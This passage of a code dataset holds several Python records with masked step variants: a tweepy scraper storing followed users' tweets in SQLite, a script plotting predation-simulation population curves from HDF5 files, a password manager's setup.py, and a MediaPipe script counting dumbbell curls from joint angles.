consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n api = tweepy.API(auth, wait_on_rate_limit=True)\n\n return api\n\n # connects to tweet_dump.db creates tdump if not exists\n # tdump stores all tweets from anyone in list\n def all_tweet_db():\n\n conn = sqlite3.connect('tweet_dump_main.db')\n c = conn.cursor()\n\n c.execute('''CREATE TABLE IF NOT EXISTS tdump\n (tweet TEXT,\n username TEXT,\n tweet_date TEXT,\n tweet_id TEXT,\n tweet_source TEXT,\n user_id TEXT)''')\n\n return c, conn\n\n # connects to tweet_dump.db creats served if not exists\n # served stores tweets that are mention authenticated user\n def mention_tweet_db():\n\n conn = sqlite3.connect('tweet_dump_main.db')\n c = conn.cursor()\n\n c.execute('''CREATE TABLE IF NOT EXISTS mentioned\n (tweet TEXT,\n username TEXT,\n tweet_date TEXT,\n tweet_id TEXT,\n tweet_source TEXT,\n user_id TEXT)''')\n\n return c, conn\n\n # looks for new friends by comparing authenticated\n # user's friend list with list of friends in tdump\n def new_f_check(api, c):\n\n # get list of user's ids\n c.execute('SELECT user_id FROM tdump')\n users = c.fetchall()\n users = list(set([user[0] for user in users]))\n\n # get list of friends_ids from twitter\n friends_ids = api.friends_ids()\n\n new_friends = [x for x in friends_ids if str(x) not in users]\n\n return new_friends\n\n # downloads up to 3200 of a user's most\n # recent tweets commits to tdump\n def download_to_limit(api, c, conn, friend_list):\n\n # List of tweet ids already in db\n c.execute('SELECT tweet_id FROM tdump')\n tweet_ids = c.fetchall()\n tweet_ids = [e[0] for e in tweet_ids]\n\n new_tweets = []\n\n for friend in friend_list:\n\n try:\n # try to get most recent 200 tweets from friend\n get_tweets = api.user_timeline(id=friend, count=200)\n\n except Exception as e:\n\n continue\n\n # add to list of all of this friend's tweets\n new_tweets.extend(get_tweets)\n\n # find oldest retrieved tweet's id number less 1\n oldest = new_tweets[-1].id - 1\n\n # get tweets until 3200 limit hit\n while len(get_tweets) > 0:\n\n try:\n # max_id arg looks for id's less than arg's value\n get_tweets = api.user_timeline(id=friend,\n count=200,\n max_id=oldest)\n\n except Exception as e:\n\n continue\n\n new_tweets.extend(get_tweets)\n\n oldest = new_tweets[-1].id - 1\n\n if len(new_tweets) != 
0:\n\n print('Insert Active')\n\n for tweet in new_tweets:\n\n c.execute('''INSERT INTO tdump\n (tweet,\n username,\n tweet_date,\n tweet_id,\n tweet_source,\n user_id)\n VALUES(?,?,?,?,?,?)''',\n [tweet.text,\n tweet.user.screen_name,\n tweet.created_at,\n tweet.id_str,\n tweet.source,\n tweet.user.id_str])\n\n conn.commit()\n\n if len(new_tweets) != 0:\n\n print('Insert Done' + '\\n')\n\n # simply check if tweet text contains my screen name\n # change from hard code later\n def mention_me(new_tweet_list, c, conn):\n\n mentioned = [x for x in new_tweet_list if '@BonneNick' in x[0]]\n\n if len(new_tweet_list) != 0:\n\n print('Insert Active')\n\n for tweet in mentioned:\n\n c.execute('''INSERT INTO served\n (tweet,\n username,\n tweet_date,\n tweet_id,\n tweet_source,\n user_id)\n VALUES(?,?,?,?,?,?)''',\n [tweet.text,\n tweet.user.screen_name,\n tweet.created_at,\n tweet.id_str,\n tweet.source,\n tweet.user.id_str])\n\n conn.commit()\n\n if len(new_tweet_list) != 0:\n\n print('Insert Done' + '\\n')\n\n # returns list of user_id and created_at pairs\n # date associated with user_id is date of last\n # tweet in database\n def last_tweets(c, conn):\n\n # list of user ids and the date of the\n # last tweet in db\n user_last_tweets = []\n\n # get list of user's ids\n c.execute('SELECT user_id FROM tdump')\n users = c.fetchall()\n users = list(set([user[0] for user in users]))\n\n for user in users:\n\n c.execute('''SELECT user_id, tweet_id\n FROM tdump\n WHERE user_id = ?\n ORDER BY tweet_date DESC''',\n [user])\n\n last_tweet = c.fetchone()\n user_last_tweets.append(last_tweet)\n\n return user_last_tweets\n\n # downloads most recent posts in each users timelines\n def download_recent(api, c, conn, last_tweets):\n\n c.execute('SELECT tweet_id FROM tdump')\n tweet_ids = [x[0] for x in c.fetchall()]\n\n new_tweets = []\n\n for pair in last_tweets:\n\n user_id = pair[0]\n tweet_id = pair[1]\n\n try:\n\n get_tweets = api.user_timeline(id=user_id,\n since_id=tweet_id,\n count=200)\n\n except Exception:\n\n continue\n\n if len(get_tweets) != 0:\n\n # add to list of all of this friend's tweets\n new_tweets.extend(get_tweets)\n\n # find newest retrieved tweet's id number plus 1\n newest = get_tweets[0].id + 1\n\n while len(get_tweets) > 0:\n\n try:\n # max_id arg looks for id's less than arg's value\n get_tweets = api.user_timeline(id=user_id,\n count=200,\n since_id=newest)\n\n new_tweets.extend(get_tweets)\n\n newest = get_tweets[0].id + 1\n\n except Exception:\n\n continue\n\n if len(new_tweets) != 0:\n\n print('Insert Active')\n\n for tweet in new_tweets:\n\n if tweet.user.screen_name != 'BonneNick' \\\n and tweet.id not in tweet_ids:\n\n c.execute('''INSERT INTO tdump\n (tweet,\n username,\n tweet_date,\n tweet_id,\n tweet_source,\n user_id)\n VALUES(?,?,?,?,?,?)''',\n [tweet.text,\n tweet.user.screen_name,\n tweet.created_at,\n tweet.id_str,\n tweet.source,\n tweet.user.id_str])\n\n conn.commit()\n conn.close()\n\n if len(new_tweets) != 0:\n\n print('Insert Done' + '\\n')\n\n\nif __name__ == '__main__':\n\n main()\n",
"step-ids": [
5,
9,
11,
12,
14
]
}
|
[
5,
9,
11,
12,
14
] |
import numpy as np
import math
import os
if os.getcwd().rfind('share') > 0:
topsy = True
import matplotlib as mpl
mpl.use('Agg')
else:
topsy = False
from matplotlib import rc
import matplotlib.pyplot as plt
from matplotlib import rc
from matplotlib import cm
from scipy.optimize import curve_fit
import sys
import h5py
from glob import glob
pwd = os.getcwd()
k = int(pwd[pwd.rfind('pred')+4:])
number_of_lines = len(glob('group*[0-9]*'))
cm_subsection = np.linspace(0., 1., number_of_lines)
colors = [ cm.magma(x) for x in cm_subsection]
Z = [[0,0],[0,0]]
levels = range(5,500+5,5)
CS3 = plt.contourf(Z, levels, cmap='magma')
plt.clf()
area = []
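# Centered moving average via convolution; 'same' mode keeps the output length equal to the input, at the cost of zero-biased values near the edges.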
def movingaverage(interval, window_size):
window= np.ones(int(window_size))/float(window_size)
return np.convolve(interval, window, 'same')
j = 0
for group in sorted(glob('group*[0-9]*')):
files = glob(group + '/data*.h5')
	print(group)
alive = []
time = []
plotPeriod = 0.1
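	# Down-sample each run: keep one (time, alive-count) sample per plotPeriod interval.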
for dFile in files:
value = dFile[dFile.rfind('-')+1:dFile.rfind('.')]
data = dict()
h5f = h5py.File(dFile,'r')
itime = np.copy(h5f['itime'])[0]
data['alive'] = np.copy(h5f['alive'])
data['t'] = np.copy(h5f['t'])
lastPlot = 0
for i in range(itime):
if data['t'][i] - lastPlot > plotPeriod:
time.append(data['t'][i])
alive.append(data['alive'][i].sum())
lastPlot = data['t'][i]
alive = np.array(alive).reshape(len(alive), 1)
time = np.array(time).reshape(len(time), 1)
data = np.append(time, alive, axis = 1)
data = data.tolist()
data2 = sorted(data, key=lambda x : x[0])
data2 = np.array(data2)
	if np.shape(data2)[0] > 0:
		y_av = movingaverage(data2[:,1], 75)
		plt.plot(data2[:,0][100:-50], y_av[100:-50], label = group, color = colors[j])
		trap = np.trapz(y_av[100:-50], x = data2[:,0][100:-50])
		area += [[int(group[5:]), trap]]
	j += 1
plt.colorbar(CS3)
plt.xlabel('Time', fontsize = 18)
plt.ylabel('$N(t)$', fontsize = 18)
plt.savefig('./groupPredation')
np.save('./area.npy', area)
area = np.array(area)
plt.plot(area[:,0], area[:,1], lw = 2)
y_av = movingaverage(area[:,1], 3)
plt.plot(area[:,0][5:-5], y_av[5:-5], lw = 2)
plt.xlabel('Group Size', fontsize = 18)
plt.ylabel('Area', fontsize = 18)
plt.savefig('./groupPredationArea.png')
|
normal
|
{
"blob_id": "2539411c7b348662dbe9ebf87e26faacc20f4c5e",
"index": 3837,
"step-1": "import numpy as np\nimport math\nimport os\nif os.getcwd().rfind('share') > 0:\n\ttopsy = True\n\timport matplotlib as mpl\n\tmpl.use('Agg')\nelse:\n\ttopsy = False\n\tfrom matplotlib import rc\nimport matplotlib.pyplot as plt\nfrom matplotlib import rc\nfrom matplotlib import cm\nfrom scipy.optimize import curve_fit\nimport sys\nimport h5py\nfrom glob import glob\n\npwd = os.getcwd()\nk = int(pwd[pwd.rfind('pred')+4:])\n\nnumber_of_lines = len(glob('group*[0-9]*'))\ncm_subsection = np.linspace(0., 1., number_of_lines)\ncolors = [ cm.magma(x) for x in cm_subsection]\n\nZ = [[0,0],[0,0]]\nlevels = range(5,500+5,5)\nCS3 = plt.contourf(Z, levels, cmap='magma')\nplt.clf()\n\narea = []\n\ndef movingaverage(interval, window_size):\n window= np.ones(int(window_size))/float(window_size)\n return np.convolve(interval, window, 'same')\n\nj = 0\nfor group in sorted(glob('group*[0-9]*')):\n\tfiles = glob(group + '/data*.h5')\n\tprint group\n\n\talive = []\n\ttime = []\n\tplotPeriod = 0.1\n\n\tfor dFile in files:\n\t\tvalue = dFile[dFile.rfind('-')+1:dFile.rfind('.')]\n\n\t\tdata = dict()\n\t\th5f = h5py.File(dFile,'r')\n\t\titime = np.copy(h5f['itime'])[0]\n\t\tdata['alive'] = np.copy(h5f['alive'])\n\t\tdata['t'] = np.copy(h5f['t'])\n\n\t\tlastPlot = 0\n\t\tfor i in range(itime):\n\t\t\tif data['t'][i] - lastPlot > plotPeriod:\n\t\t\t\ttime.append(data['t'][i])\n\t\t\t\talive.append(data['alive'][i].sum())\n\t\t\t\tlastPlot = data['t'][i]\n\n\n\talive = np.array(alive).reshape(len(alive), 1)\n\ttime = np.array(time).reshape(len(time), 1)\n\n\tdata = np.append(time, alive, axis = 1)\n\tdata = data.tolist()\n\tdata2 = sorted(data, key=lambda x : x[0])\n\tdata2 = np.array(data2)\n\n\tif np.shape(data2)[0] > 0:\n\t\ty_av = movingaverage(data2[:,1], 75)\n\t\tplt.plot(data2[:,0][100:-50], y_av[100:-50], label = group, color = colors[j])\n\n\ttrap = np.trapz(y_av[100:-50], x = data2[:,0][100:-50])\n\tarea += [[int(group[5:]), trap]]\n\tj +=1\nplt.colorbar(CS3)\nplt.xlabel('Time', fontsize = 18)\nplt.ylabel('$N(t)$', fontsize = 18)\nplt.savefig('./groupPredation')\n\n\nnp.save('./area.npy', area)\narea = np.array(area)\nplt.plot(area[:,0], area[:,1], lw = 2)\ny_av = movingaverage(area[:,1], 3)\nplt.plot(area[:,0][5:-5], y_av[5:-5], lw = 2)\nplt.xlabel('Group Size', fontsize = 18)\nplt.ylabel('Area', fontsize = 18)\nplt.savefig('./groupPredationArea.png')\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# -*- encoding:utf-8 -*-
from setuptools import setup, find_packages
setup(
name='pass-manager',
version='1.2.0',
author='petitviolet',
author_email='[email protected]',
packages=find_packages(),
description = 'Simple CLI Password Manager',
long_description = 'Please show help (pass-manager -h)',
url = 'https://github.com/petitviolet/pass-manager',
license = 'MIT',
# scripts = ['src/pass_manager.py'],
platforms = ['Mac OS X'],
# platforms = ['POSIX', 'Windows', 'Mac OS X'],
entry_points={
'console_scripts': 'pass-manager = src.pass_manager:main'
},
zip_safe=False,
install_requires = ['crypto'],
classifiers=[
'Environment :: Console',
'Intended Audience :: Developers',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Utilities'
]
)
|
normal
|
{
"blob_id": "31664f1cc808ccc0dad230e2b955692c7ae12db1",
"index": 1792,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nsetup(name='pass-manager', version='1.2.0', author='petitviolet',\n author_email='[email protected]', packages=find_packages(),\n description='Simple CLI Password Manager', long_description=\n 'Please show help (pass-manager -h)', url=\n 'https://github.com/petitviolet/pass-manager', license='MIT', platforms\n =['Mac OS X'], entry_points={'console_scripts':\n 'pass-manager = src.pass_manager:main'}, zip_safe=False,\n install_requires=['crypto'], classifiers=['Environment :: Console',\n 'Intended Audience :: Developers', 'Operating System :: OS Independent',\n 'Programming Language :: Python', 'Topic :: Utilities'])\n",
"step-3": "from setuptools import setup, find_packages\nsetup(name='pass-manager', version='1.2.0', author='petitviolet',\n author_email='[email protected]', packages=find_packages(),\n description='Simple CLI Password Manager', long_description=\n 'Please show help (pass-manager -h)', url=\n 'https://github.com/petitviolet/pass-manager', license='MIT', platforms\n =['Mac OS X'], entry_points={'console_scripts':\n 'pass-manager = src.pass_manager:main'}, zip_safe=False,\n install_requires=['crypto'], classifiers=['Environment :: Console',\n 'Intended Audience :: Developers', 'Operating System :: OS Independent',\n 'Programming Language :: Python', 'Topic :: Utilities'])\n",
"step-4": "# -*- encoding:utf-8 -*-\nfrom setuptools import setup, find_packages\n\nsetup(\n name='pass-manager',\n version='1.2.0',\n author='petitviolet',\n author_email='[email protected]',\n packages=find_packages(),\n description = 'Simple CLI Password Manager',\n long_description = 'Please show help (pass-manager -h)',\n url = 'https://github.com/petitviolet/pass-manager',\n license = 'MIT',\n # scripts = ['src/pass_manager.py'],\n platforms = ['Mac OS X'],\n # platforms = ['POSIX', 'Windows', 'Mac OS X'],\n entry_points={\n 'console_scripts': 'pass-manager = src.pass_manager:main'\n },\n zip_safe=False,\n install_requires = ['crypto'],\n classifiers=[\n 'Environment :: Console',\n 'Intended Audience :: Developers',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Topic :: Utilities'\n ]\n)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class PoseEstimator(base.PoseDetector):
<|reserved_special_token_0|>
def findAngle(self, img, p1, p2, p3, draw=True):
x1, y1 = self.lms[p1][1:]
x2, y2 = self.lms[p2][1:]
x3, y3 = self.lms[p3][1:]
angle = math.degrees(math.atan2(y3 - y2, x3 - x2) - math.atan2(y1 -
y2, x1 - x2))
if angle < 0:
angle += 360
if draw:
cv2.line(img, (x1, y1), (x2, y2), (255, 255, 255), 2)
cv2.line(img, (x3, y3), (x2, y2), (255, 255, 255), 2)
cv2.circle(img, (x1, y1), 8, (0, 0, 255), cv2.FILLED)
cv2.circle(img, (x1, y1), 12, (0, 0, 255), 2)
cv2.circle(img, (x2, y2), 8, (0, 0, 255), cv2.FILLED)
cv2.circle(img, (x2, y2), 12, (0, 0, 255), 2)
cv2.circle(img, (x3, y3), 8, (0, 0, 255), cv2.FILLED)
cv2.circle(img, (x3, y3), 12, (0, 0, 255), 2)
cv2.putText(img, str(int(angle)), (x2 - 40, y2 + 50), cv2.
FONT_HERSHEY_PLAIN, 2, (255, 0, 255), 2)
return angle
def countReps(self, img, p1, p2, p3):
angle = self.findAngle(img, p1, p2, p3)
perc = np.interp(angle, (210, 320), (0, 100))
color = 0, 255, 0
if perc > 95:
color = 0, 0, 255
if self.dir == 0:
self.count += 0.5
self.dir = 1
if perc == 0:
color = 255, 0, 0
if self.dir == 1:
self.count += 0.5
self.dir = 0
cv2.putText(img, f'{int(self.count)}', (30, 120), cv2.
FONT_HERSHEY_PLAIN, 9, (255, 0, 0), 4)
bar = np.interp(perc, (0, 100), (800, 200))
cv2.rectangle(img, (50, 200), (100, 800), color, 3)
cv2.rectangle(img, (50, int(bar)), (100, 800), color, cv2.FILLED)
cv2.putText(img, f'{int(perc)}%', (30, 870), cv2.FONT_HERSHEY_PLAIN,
4, (255, 0, 0), 4)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class PoseEstimator(base.PoseDetector):
def __init__(self, mode=False, upperBody=False, smooth=True, detectConf
=0.5, trackConf=0.5, outFile='output.mp4', outWidth=720, outHeight=1280
):
super().__init__(mode, upperBody, smooth, detectConf, trackConf,
outFile, outWidth, outHeight)
self.count = 0
self.dir = 0
def findAngle(self, img, p1, p2, p3, draw=True):
x1, y1 = self.lms[p1][1:]
x2, y2 = self.lms[p2][1:]
x3, y3 = self.lms[p3][1:]
angle = math.degrees(math.atan2(y3 - y2, x3 - x2) - math.atan2(y1 -
y2, x1 - x2))
if angle < 0:
angle += 360
if draw:
cv2.line(img, (x1, y1), (x2, y2), (255, 255, 255), 2)
cv2.line(img, (x3, y3), (x2, y2), (255, 255, 255), 2)
cv2.circle(img, (x1, y1), 8, (0, 0, 255), cv2.FILLED)
cv2.circle(img, (x1, y1), 12, (0, 0, 255), 2)
cv2.circle(img, (x2, y2), 8, (0, 0, 255), cv2.FILLED)
cv2.circle(img, (x2, y2), 12, (0, 0, 255), 2)
cv2.circle(img, (x3, y3), 8, (0, 0, 255), cv2.FILLED)
cv2.circle(img, (x3, y3), 12, (0, 0, 255), 2)
cv2.putText(img, str(int(angle)), (x2 - 40, y2 + 50), cv2.
FONT_HERSHEY_PLAIN, 2, (255, 0, 255), 2)
return angle
def countReps(self, img, p1, p2, p3):
angle = self.findAngle(img, p1, p2, p3)
perc = np.interp(angle, (210, 320), (0, 100))
color = 0, 255, 0
if perc > 95:
color = 0, 0, 255
if self.dir == 0:
self.count += 0.5
self.dir = 1
if perc == 0:
color = 255, 0, 0
if self.dir == 1:
self.count += 0.5
self.dir = 0
cv2.putText(img, f'{int(self.count)}', (30, 120), cv2.
FONT_HERSHEY_PLAIN, 9, (255, 0, 0), 4)
bar = np.interp(perc, (0, 100), (800, 200))
cv2.rectangle(img, (50, 200), (100, 800), color, 3)
cv2.rectangle(img, (50, int(bar)), (100, 800), color, cv2.FILLED)
cv2.putText(img, f'{int(perc)}%', (30, 870), cv2.FONT_HERSHEY_PLAIN,
4, (255, 0, 0), 4)
def main():
cap = cv2.VideoCapture('media/1.mp4')
estimator = PoseEstimator()
while True:
_, img = cap.read()
img = cv2.resize(img, (720, 1280))
img = estimator.findPose(img)
lms = estimator.findPosition(img, draw=False)
if len(lms) > 28:
estimator.countReps(img, 11, 13, 15)
cv2.imshow('Correct Pose Estimation', img)
if cv2.waitKey(1) & 255 == ord('q'):
cap.release()
cv2.destroyAllWindows()
break
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class PoseEstimator(base.PoseDetector):
def __init__(self, mode=False, upperBody=False, smooth=True, detectConf
=0.5, trackConf=0.5, outFile='output.mp4', outWidth=720, outHeight=1280
):
super().__init__(mode, upperBody, smooth, detectConf, trackConf,
outFile, outWidth, outHeight)
self.count = 0
self.dir = 0
def findAngle(self, img, p1, p2, p3, draw=True):
x1, y1 = self.lms[p1][1:]
x2, y2 = self.lms[p2][1:]
x3, y3 = self.lms[p3][1:]
angle = math.degrees(math.atan2(y3 - y2, x3 - x2) - math.atan2(y1 -
y2, x1 - x2))
if angle < 0:
angle += 360
if draw:
cv2.line(img, (x1, y1), (x2, y2), (255, 255, 255), 2)
cv2.line(img, (x3, y3), (x2, y2), (255, 255, 255), 2)
cv2.circle(img, (x1, y1), 8, (0, 0, 255), cv2.FILLED)
cv2.circle(img, (x1, y1), 12, (0, 0, 255), 2)
cv2.circle(img, (x2, y2), 8, (0, 0, 255), cv2.FILLED)
cv2.circle(img, (x2, y2), 12, (0, 0, 255), 2)
cv2.circle(img, (x3, y3), 8, (0, 0, 255), cv2.FILLED)
cv2.circle(img, (x3, y3), 12, (0, 0, 255), 2)
cv2.putText(img, str(int(angle)), (x2 - 40, y2 + 50), cv2.
FONT_HERSHEY_PLAIN, 2, (255, 0, 255), 2)
return angle
def countReps(self, img, p1, p2, p3):
angle = self.findAngle(img, p1, p2, p3)
perc = np.interp(angle, (210, 320), (0, 100))
color = 0, 255, 0
if perc > 95:
color = 0, 0, 255
if self.dir == 0:
self.count += 0.5
self.dir = 1
if perc == 0:
color = 255, 0, 0
if self.dir == 1:
self.count += 0.5
self.dir = 0
cv2.putText(img, f'{int(self.count)}', (30, 120), cv2.
FONT_HERSHEY_PLAIN, 9, (255, 0, 0), 4)
bar = np.interp(perc, (0, 100), (800, 200))
cv2.rectangle(img, (50, 200), (100, 800), color, 3)
cv2.rectangle(img, (50, int(bar)), (100, 800), color, cv2.FILLED)
cv2.putText(img, f'{int(perc)}%', (30, 870), cv2.FONT_HERSHEY_PLAIN,
4, (255, 0, 0), 4)
def main():
cap = cv2.VideoCapture('media/1.mp4')
estimator = PoseEstimator()
while True:
_, img = cap.read()
img = cv2.resize(img, (720, 1280))
img = estimator.findPose(img)
lms = estimator.findPosition(img, draw=False)
if len(lms) > 28:
estimator.countReps(img, 11, 13, 15)
cv2.imshow('Correct Pose Estimation', img)
if cv2.waitKey(1) & 255 == ord('q'):
cap.release()
cv2.destroyAllWindows()
break
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
import cv2
import mediapipe as mp
import base
import math
import numpy as np
class PoseEstimator(base.PoseDetector):
def __init__(self, mode=False, upperBody=False, smooth=True, detectConf
=0.5, trackConf=0.5, outFile='output.mp4', outWidth=720, outHeight=1280
):
super().__init__(mode, upperBody, smooth, detectConf, trackConf,
outFile, outWidth, outHeight)
self.count = 0
self.dir = 0
def findAngle(self, img, p1, p2, p3, draw=True):
x1, y1 = self.lms[p1][1:]
x2, y2 = self.lms[p2][1:]
x3, y3 = self.lms[p3][1:]
angle = math.degrees(math.atan2(y3 - y2, x3 - x2) - math.atan2(y1 -
y2, x1 - x2))
if angle < 0:
angle += 360
if draw:
cv2.line(img, (x1, y1), (x2, y2), (255, 255, 255), 2)
cv2.line(img, (x3, y3), (x2, y2), (255, 255, 255), 2)
cv2.circle(img, (x1, y1), 8, (0, 0, 255), cv2.FILLED)
cv2.circle(img, (x1, y1), 12, (0, 0, 255), 2)
cv2.circle(img, (x2, y2), 8, (0, 0, 255), cv2.FILLED)
cv2.circle(img, (x2, y2), 12, (0, 0, 255), 2)
cv2.circle(img, (x3, y3), 8, (0, 0, 255), cv2.FILLED)
cv2.circle(img, (x3, y3), 12, (0, 0, 255), 2)
cv2.putText(img, str(int(angle)), (x2 - 40, y2 + 50), cv2.
FONT_HERSHEY_PLAIN, 2, (255, 0, 255), 2)
return angle
def countReps(self, img, p1, p2, p3):
angle = self.findAngle(img, p1, p2, p3)
perc = np.interp(angle, (210, 320), (0, 100))
color = 0, 255, 0
if perc > 95:
color = 0, 0, 255
if self.dir == 0:
self.count += 0.5
self.dir = 1
if perc == 0:
color = 255, 0, 0
if self.dir == 1:
self.count += 0.5
self.dir = 0
cv2.putText(img, f'{int(self.count)}', (30, 120), cv2.
FONT_HERSHEY_PLAIN, 9, (255, 0, 0), 4)
bar = np.interp(perc, (0, 100), (800, 200))
cv2.rectangle(img, (50, 200), (100, 800), color, 3)
cv2.rectangle(img, (50, int(bar)), (100, 800), color, cv2.FILLED)
cv2.putText(img, f'{int(perc)}%', (30, 870), cv2.FONT_HERSHEY_PLAIN,
4, (255, 0, 0), 4)
def main():
cap = cv2.VideoCapture('media/1.mp4')
estimator = PoseEstimator()
while True:
_, img = cap.read()
img = cv2.resize(img, (720, 1280))
img = estimator.findPose(img)
lms = estimator.findPosition(img, draw=False)
if len(lms) > 28:
estimator.countReps(img, 11, 13, 15)
cv2.imshow('Correct Pose Estimation', img)
if cv2.waitKey(1) & 255 == ord('q'):
cap.release()
cv2.destroyAllWindows()
break
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
# Counts number of dumbbell curls in the video
import cv2
import mediapipe as mp
import base
import math
import numpy as np
class PoseEstimator(base.PoseDetector):
def __init__(self, mode=False, upperBody = False, smooth=True, detectConf=.5, trackConf=.5,
outFile="output.mp4", outWidth=720, outHeight=1280):
super().__init__(mode, upperBody, smooth, detectConf, trackConf, outFile, outWidth, outHeight)
self.count = 0
self.dir = 0
def findAngle(self, img, p1, p2, p3, draw=True):
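        # Angle at landmark p2 between segments p2-p1 and p2-p3, in degrees, normalised to [0, 360).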
x1,y1 = self.lms[p1][1:]
x2,y2 = self.lms[p2][1:]
x3,y3 = self.lms[p3][1:]
angle = math.degrees(math.atan2(y3-y2,x3-x2) - math.atan2(y1-y2,x1-x2))
if angle<0:
angle += 360
if draw:
cv2.line(img, (x1,y1), (x2,y2), (255,255,255) ,2)
cv2.line(img, (x3,y3), (x2,y2), (255,255,255) ,2)
cv2.circle(img, (x1,y1), 8, (0,0,255), cv2.FILLED)
cv2.circle(img, (x1,y1), 12, (0,0,255), 2)
cv2.circle(img, (x2,y2), 8, (0,0,255), cv2.FILLED)
cv2.circle(img, (x2,y2), 12, (0,0,255), 2)
cv2.circle(img, (x3,y3), 8, (0,0,255), cv2.FILLED)
cv2.circle(img, (x3,y3), 12, (0,0,255), 2)
cv2.putText(img, str(int(angle)), (x2-40,y2+50), cv2.FONT_HERSHEY_PLAIN, 2, (255,0,255), 2)
return angle
def countReps(self, img, p1, p2, p3):
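        # Map the joint angle onto a 0-100% range and count one rep per full extend/contract cycle (0.5 at each extreme).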
angle = self.findAngle(img, p1, p2, p3)
perc = np.interp(angle, (210,320), (0,100))
color = (0,255,0)
if perc > 95:
color = (0,0,255)
if self.dir == 0:
self.count += .5
self.dir = 1
if perc == 0:
color = (255,0,0)
if self.dir == 1:
self.count += .5
self.dir = 0
cv2.putText(img, f'{int(self.count)}', (30,120), cv2.FONT_HERSHEY_PLAIN, 9, (255,0,0), 4)
bar = np.interp(perc, (0,100), (800,200))
cv2.rectangle(img, (50,200), (100,800), color, 3)
cv2.rectangle(img, (50,int(bar)), (100,800), color, cv2.FILLED)
cv2.putText(img, f'{int(perc)}%', (30,870), cv2.FONT_HERSHEY_PLAIN, 4, (255,0,0), 4)
def main():
cap = cv2.VideoCapture("media/1.mp4")
estimator = PoseEstimator()
while True:
_, img = cap.read()
img = cv2.resize(img, (720, 1280))
img = estimator.findPose(img)
lms = estimator.findPosition(img, draw=False)
if len(lms)>28:
estimator.countReps(img,11,13,15)
# estimator.writeFrame(img)
cv2.imshow("Correct Pose Estimation", img)
if cv2.waitKey(1) & 0xFF == ord('q'):
cap.release()
cv2.destroyAllWindows()
break
if __name__ == "__main__":
main()
|
flexible
|
{
"blob_id": "4a886437727ed6b48206e12b686a59a1d2a1c489",
"index": 4948,
"step-1": "<mask token>\n\n\nclass PoseEstimator(base.PoseDetector):\n <mask token>\n\n def findAngle(self, img, p1, p2, p3, draw=True):\n x1, y1 = self.lms[p1][1:]\n x2, y2 = self.lms[p2][1:]\n x3, y3 = self.lms[p3][1:]\n angle = math.degrees(math.atan2(y3 - y2, x3 - x2) - math.atan2(y1 -\n y2, x1 - x2))\n if angle < 0:\n angle += 360\n if draw:\n cv2.line(img, (x1, y1), (x2, y2), (255, 255, 255), 2)\n cv2.line(img, (x3, y3), (x2, y2), (255, 255, 255), 2)\n cv2.circle(img, (x1, y1), 8, (0, 0, 255), cv2.FILLED)\n cv2.circle(img, (x1, y1), 12, (0, 0, 255), 2)\n cv2.circle(img, (x2, y2), 8, (0, 0, 255), cv2.FILLED)\n cv2.circle(img, (x2, y2), 12, (0, 0, 255), 2)\n cv2.circle(img, (x3, y3), 8, (0, 0, 255), cv2.FILLED)\n cv2.circle(img, (x3, y3), 12, (0, 0, 255), 2)\n cv2.putText(img, str(int(angle)), (x2 - 40, y2 + 50), cv2.\n FONT_HERSHEY_PLAIN, 2, (255, 0, 255), 2)\n return angle\n\n def countReps(self, img, p1, p2, p3):\n angle = self.findAngle(img, p1, p2, p3)\n perc = np.interp(angle, (210, 320), (0, 100))\n color = 0, 255, 0\n if perc > 95:\n color = 0, 0, 255\n if self.dir == 0:\n self.count += 0.5\n self.dir = 1\n if perc == 0:\n color = 255, 0, 0\n if self.dir == 1:\n self.count += 0.5\n self.dir = 0\n cv2.putText(img, f'{int(self.count)}', (30, 120), cv2.\n FONT_HERSHEY_PLAIN, 9, (255, 0, 0), 4)\n bar = np.interp(perc, (0, 100), (800, 200))\n cv2.rectangle(img, (50, 200), (100, 800), color, 3)\n cv2.rectangle(img, (50, int(bar)), (100, 800), color, cv2.FILLED)\n cv2.putText(img, f'{int(perc)}%', (30, 870), cv2.FONT_HERSHEY_PLAIN,\n 4, (255, 0, 0), 4)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass PoseEstimator(base.PoseDetector):\n\n def __init__(self, mode=False, upperBody=False, smooth=True, detectConf\n =0.5, trackConf=0.5, outFile='output.mp4', outWidth=720, outHeight=1280\n ):\n super().__init__(mode, upperBody, smooth, detectConf, trackConf,\n outFile, outWidth, outHeight)\n self.count = 0\n self.dir = 0\n\n def findAngle(self, img, p1, p2, p3, draw=True):\n x1, y1 = self.lms[p1][1:]\n x2, y2 = self.lms[p2][1:]\n x3, y3 = self.lms[p3][1:]\n angle = math.degrees(math.atan2(y3 - y2, x3 - x2) - math.atan2(y1 -\n y2, x1 - x2))\n if angle < 0:\n angle += 360\n if draw:\n cv2.line(img, (x1, y1), (x2, y2), (255, 255, 255), 2)\n cv2.line(img, (x3, y3), (x2, y2), (255, 255, 255), 2)\n cv2.circle(img, (x1, y1), 8, (0, 0, 255), cv2.FILLED)\n cv2.circle(img, (x1, y1), 12, (0, 0, 255), 2)\n cv2.circle(img, (x2, y2), 8, (0, 0, 255), cv2.FILLED)\n cv2.circle(img, (x2, y2), 12, (0, 0, 255), 2)\n cv2.circle(img, (x3, y3), 8, (0, 0, 255), cv2.FILLED)\n cv2.circle(img, (x3, y3), 12, (0, 0, 255), 2)\n cv2.putText(img, str(int(angle)), (x2 - 40, y2 + 50), cv2.\n FONT_HERSHEY_PLAIN, 2, (255, 0, 255), 2)\n return angle\n\n def countReps(self, img, p1, p2, p3):\n angle = self.findAngle(img, p1, p2, p3)\n perc = np.interp(angle, (210, 320), (0, 100))\n color = 0, 255, 0\n if perc > 95:\n color = 0, 0, 255\n if self.dir == 0:\n self.count += 0.5\n self.dir = 1\n if perc == 0:\n color = 255, 0, 0\n if self.dir == 1:\n self.count += 0.5\n self.dir = 0\n cv2.putText(img, f'{int(self.count)}', (30, 120), cv2.\n 